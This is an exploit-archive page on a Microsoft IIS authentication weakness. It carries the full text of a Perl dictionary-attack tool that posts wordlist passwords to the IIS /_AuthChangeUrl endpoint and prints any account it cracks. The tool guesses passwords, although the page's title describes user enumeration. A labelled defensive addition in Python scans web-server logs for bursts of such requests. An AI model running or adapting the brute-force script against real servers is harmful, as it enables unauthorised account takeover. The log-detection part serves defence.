Microsoft IIS User Enumeration Vulnerability - exploit.company
vendor: Internet Information Services (IIS)
by: JeiAr
CVSS: 5.5 (MEDIUM)
User Enumeration
CWE: 200
Product Name: Internet Information Services (IIS)
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE: a:microsoft:iis
Metasploit:
Other Scripts:
Platforms Tested: Windows
2003

Microsoft IIS User Enumeration Vulnerability

Microsoft IIS is prone to an issue where the existence of users may be revealed to remote attackers. The vulnerability exists when users attempt to authenticate against a vulnerable system. IIS will generate an error page if authentication fails. Different messages are generated depending on whether the user exists or not.

Mitigation:

Ensure that the error pages IIS generates on failed authentication do not reveal whether a user exists.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7492/info

###########################################################################################
# Microsoft IIS Authentication Manager BruteForce Tool - By JeiAr http://www.gulftech.org
###########################################################################################
# This tool can be used to brute force user accounts via dictionary attack on the Microsoft
# IIS Authentication Manager. More details here http://www.securityfocus.com/archive/1/8515
###########################################################################################

use LWP::UserAgent;

###########################################################################################
# Time to create the new LWP User Agent, clear the screen, and print out the script's header
###########################################################################################

$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
system('cls');
&header;

###########################################################################################
# Gather all user-supplied data, such as the domain name, host and location of the wordlist
###########################################################################################
 
print "Host: ";
$host=<STDIN>;
chomp $host;
print "Domain: ";
$domain=<STDIN>;
chomp $domain;
print "Account: ";
$account=<STDIN>;
chomp $account;
print "Word List: ";
$list=<STDIN>;
chomp $list;

###########################################################################################
# Opens the wordlist and puts the data into an array, afterward setting the count variables
###########################################################################################

open (DATAFILE, "$list");
@datafile = <DATAFILE>;
chomp(@datafile);
$length = @datafile;
$count = 0;
$found = 0;

&space;
print "Cracked Accounts\n";
print "----------------\n";

###########################################################################################
# Creates the HTTP request, checks the responses, then prints out the username if it exists
###########################################################################################

while ($count < $length) {
$password = (@datafile[$count]);
my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
   $req->content_type('application/x-www-form-urlencoded');
   $req->content("domain=$domain&acct=$account&old=$password&new=$password&new2=$password");
my $res = $ua->request($req);
$pattern = "Password successfully changed";  
$_ = $res->content;
if (/$pattern/) {
print "$account : $password\n";
last if (/$pattern/);
  }
 $count++;
}

###########################################################################################
# That's all folks. Prints out the final details and footer. Rest is just the subroutines :)
###########################################################################################

&space;
&footer;

sub header {
print "IIS Auth Manager Brute Forcing Tool By JeiAr [http://www.gulftech.org] \n";
print "---------------------------------------------------------------------- \n";
}

sub footer {
print "Session Results:\n";
print "--------------------\n";
print "Number Of Words : $length \n";
print "Number Of Tries : $count  \n";
}

sub space {
print "\n" x2;
}
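
A defender-side check for the request pattern the script above produces, repeated POSTs to /_AuthChangeUrl from a single client. It is an added example, not part of the original advisory or tool. The log lines are constructed, and the W3C field set, the threshold and the window are assumptions to tune per site.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log in W3C extended format. The field set is an assumption;
# the parser follows whatever the #Fields directive declares.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2003-05-01 10:00:01 192.0.2.10 POST /_AuthChangeUrl 200
2003-05-01 10:00:02 192.0.2.10 POST /_AuthChangeUrl 200
2003-05-01 10:00:03 192.0.2.10 POST /_AuthChangeUrl 200
2003-05-01 10:00:04 192.0.2.10 POST /_AuthChangeUrl 200
2003-05-01 10:00:05 192.0.2.10 POST /_AuthChangeUrl 200
2003-05-01 10:00:06 192.0.2.10 POST /_AuthChangeUrl 200
2003-05-01 10:03:00 198.51.100.7 POST /_AuthChangeUrl 200
2003-05-01 10:09:00 198.51.100.7 POST /_AuthChangeUrl 200
2003-05-01 10:10:00 203.0.113.5 GET /default.htm 200
"""
TARGET_STEM = "/_authchangeurl"  # endpoint the script on this page posts to

def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):  # skip truncated entries
                yield dict(zip(fields, parts))

def flag_auth_change_bursts(text, threshold=5, window=timedelta(seconds=60)):
    """Map client IP -> largest number of POSTs to the endpoint inside any
    sliding window, for clients that reach the threshold."""
    hits = defaultdict(list)
    for rec in parse_w3c(text):
        if rec.get("cs-method") == "POST" and rec.get("cs-uri-stem", "").lower() == TARGET_STEM:
            stamp = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
            hits[rec["c-ip"]].append(stamp)
    flagged = {}
    for ip, times in hits.items():
        times.sort()
        start = best = 0
        for end, stamp in enumerate(times):
            while stamp - times[start] > window:  # shrink window from the left
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged
```

With the defaults only 192.0.2.10 is reported; the two requests from 198.51.100.7 are six minutes apart and stay below the threshold.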